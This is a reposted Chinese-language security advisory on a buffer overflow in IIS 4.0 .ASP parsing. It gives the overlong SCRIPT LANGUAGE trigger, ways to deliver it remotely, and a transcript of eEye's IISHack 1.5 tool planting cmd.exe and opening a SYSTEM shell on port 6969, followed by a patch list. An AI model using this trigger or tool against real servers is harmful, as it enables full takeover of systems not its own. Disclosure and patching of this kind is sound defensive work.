IIS.ASP文件缓冲区溢出漏洞

王朝asp·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

涉及程序:

ASP

描述:

IIS .ASP文件缓冲区溢出漏洞

详细:

在Microsoft IIS 4.0的.ASP ISAPI文件解析机制中存在一个缓冲区溢出漏洞,利用该漏洞将可以获得SYSTEM水平的访问权限。

该漏洞是一个本地漏洞,但如果攻击者可以上传.acp文件,它将被远程利用。

在对Java Script中"LANGUAGE"变量的处理中,如果提供一个超长的字符串给"LANGUAGE"变量,将导致IIS解析时inetinfo.exe产生溢出。下面是一个例子.asp文件:

...

<SCRIPT LANGUAGE="[buffer]" RUNAT="Server"

</SCRIPT

..

在[buffer中]包含2220个或者更多的字符,将导致溢出发生。这可能使攻击者获取SYSTEM级别的权限。

攻击者进行远程攻击可以通过下列方法:

*对于提供虚拟主机或者asp上传的站点。攻击者只需上传一个恶意的asp文件。就可以远程获取SYSTEM权限。

*某些留言板或者BBS程序允许用户输入Java Script脚本。攻击者就可以在留言中输入包含恶意代码的Java Script语句,远程入侵系统。

*利用IIS unicode漏洞,攻击者可以远程在受影响系统上创建恶意asp文件并发动溢出攻击。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负

C:\we are still hiring good programmers iishack1.5.exe

IISHack Version 1.5

eEye Digital Security

http://www.eEye.com

Code By: Ryan Permeh & Marc Maiffret

eEye Digital Security takes no responsibility for use of this code.

It is for educational purposes only.

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com iishack1.5.exe www.[yourowncompany].com 80

6969

IISHack Version 1.5

eEye Digital Security

http://www.eEye.com

Code By: Ryan Permeh & Marc Maiffret

eEye Digital Security takes no responsibility for use of this code.

It is for educational purposes only.

Attempting to find an executable directory...

Trying directory [scripts]

Executable directory found. [scripts]

Path to executable directory is [C:\Inetpub\scripts]

Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.

Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe

Sending the exploit...

Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you

should get a cmd prompt.

C:\ telnet www.[yourowncompany].com 6969

Trying www.[yourowncompany].com...

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

C:\WINNT\system32whoami

NT AUTHORITY\SYSTEM

受影响的系统:

Microsoft IIS 4.0 sp6

- Microsoft Windows NT 4.0

不受影响系统:

Microsoft IIS 5.0

- Microsoft Windows 2000?

解决方案:

微软已经在一些hot fixes中修复了该缓冲区溢出漏洞,安装下列hot fix都可以修复此漏洞:

MS00-080: Patch Available for "Session ID Cookie Marking" Vulnerability

MS00-060: Patch Available for "IIS Cross-Site Scripting" Vulnerabilities

MS00-057: Patch Available for "File Permission Canonicalization" Vulnerability

MS00-030: Patch Available for "Malformed Extension Data in URL" Vulnerability

MS00-023: Patch Available for "Myriad Escaped Characters" Vulnerability

MS00-019: Patch Available for "Virtualized UNC Share" Vulnerability

MS00-018: Patch Available for "Chunked Encoding Post" Vulnerability

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航